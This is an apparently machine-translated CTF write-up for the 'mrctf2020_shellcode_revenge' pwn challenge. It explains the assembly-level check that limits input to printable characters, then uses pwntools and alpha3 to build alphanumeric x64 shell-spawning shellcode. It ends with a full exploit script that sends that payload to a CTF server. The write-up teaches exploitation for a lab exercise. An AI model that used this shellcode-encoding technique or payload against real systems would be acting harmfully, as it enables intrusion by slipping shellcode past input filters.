mrctf2020_shellcode_revenge
- Routine inspection, 64-bit program, open RELRO and PIE
- Run locally to see the general situation
- 64-bit ida load, no f5, just look at the assembly
jg is greater than jump, jl is less than jump, jump unconditionally jump To
let the program continue, it must jump loc_11AC
loc_123A
loc_11B8
cdqe use eax's highest bit extension All bits of rax high 32 bits
movzx are transmitted as unsigned numbers + extended (16-32)
EAX is a 32-bit register, and AX is the low 16 bits of EAX, AH is the high 8 bits of ax, and AL is ax The lower 8 bits
of the string is roughly to compare each bit of the string we input, if it is not in the range of 0x60~0x7A, then jump. The
remaining few are the jump ranges
. Justify the characters we input are roughly limited to (60, 74)||(2f,5a) In the two ranges,
search the wp of other masters, and say that this is called string.printable, which is the visible character shellcode. It can be generated using alpha3 here. Look at this master’s blog in detail . I used it directly based on his introduction.
Download alpha3
git clone https://github.com/TaQini/alpha3.git
usage
- First use pwntools to generate a shellcode
from pwn import *
context.arch='amd64'
sc = asm(shellcraft.sh())
print sc
Can't directly output, there are garbled characters, redirect the shellcode to a file,
switch to the alpha3 directory, and use alpha3 to generate string.printable
cd alpha3
python ./ALPHA3.py x64 ascii mixedcase rax --input="存储shellcode的文件" > 输出文件
Finally, send the generated shellcode to
complete exp:
from pwn import *
r = remote("node3.buuoj.cn",29334)
context(arch = 'amd64', os = 'linux', log_level = 'debug')
r.recvuntil("Show me your magic!\n")
shellcode_64="Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
payload=shellcode_64
r.send(payload)
r.interactive()
Reference wp:
https://www.cnblogs.com/chuj/p/14232150.html
https://blog.csdn.net/weixin_44145820/article/details/105565953